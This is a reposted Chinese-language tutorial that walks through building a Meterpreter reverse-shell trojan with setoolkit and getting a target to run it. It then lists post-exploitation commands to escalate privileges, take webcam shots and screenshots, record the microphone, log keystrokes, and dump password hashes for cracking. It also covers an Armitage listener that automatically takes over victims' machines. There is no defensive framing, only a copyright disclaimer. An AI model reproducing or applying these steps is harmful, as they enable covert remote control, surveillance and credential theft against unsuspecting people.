[可行]setoolkit生成木馬軟件遠程控制實例


[查看原文](http://www.cnblogs.com/AirCrk/articles/5845803.html) 1. 選1,social-ensineering attacks 2. 選4,create a payload and listener 3. 選2,Windows Reverse_TCP Meterpreter 4. LHOST 192.168.1.92 5. PORT 443 6. 得到~/.set/payload.exe

想辦法讓目標運行payload

  1. 回車開始監控。
  2. meterpreter得到,可以使用以下命令,對目標機攻擊,如果會話被關閉可以使用sessions命令查看當前可連接的會話,並用sessions -i 會話ID進行連接,使用quit命令可退出Meterpreter。

getsystem 獲取系統權限

webcam_snap 嘗試開啟攝像頭,下圖提示目標沒有攝像頭設備。

screenshot 獲取目標屏幕截屏,如下圖已經保存在了/usr/share/set下。

record_mic -d 10 錄制10秒鍾聲音

keyscan_start 開啟鍵盤記錄

keyscan_dump 查看鍵盤記錄到的內容

armitage可以設置自動上線監控

  1. 打開Armitage依次點擊菜單中的Armitage--Listeners--Set LHOST,填寫本機IP地址。
  2. 然后選擇Reverse(wait for)設置端口和類型。這里我們填寫443端口和Meterpreter類型。
  3. 配置好后點擊Start Listener開始監聽,此時msf會自動配置exploit模塊。
  4. 此時目標主機開機並運行我們的Payload文件時,目標會自動出現在Armitage控制台界面內並被開啟Meterpreter會話。
  5. 獲取目標主機開機密碼
    如果想獲得目標主機開機密碼,我們可以通過抓取Hash值的方法進行破解,步驟如下:
    在目標上右鍵依次點擊Meterpreter--Access--Dump Hashes--registry method


可以使用Ophcrack這類軟件導入Hash值進行破解。

在目標上右鍵依次點擊Meterpreter--Access--Dump Hashes--registry method


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM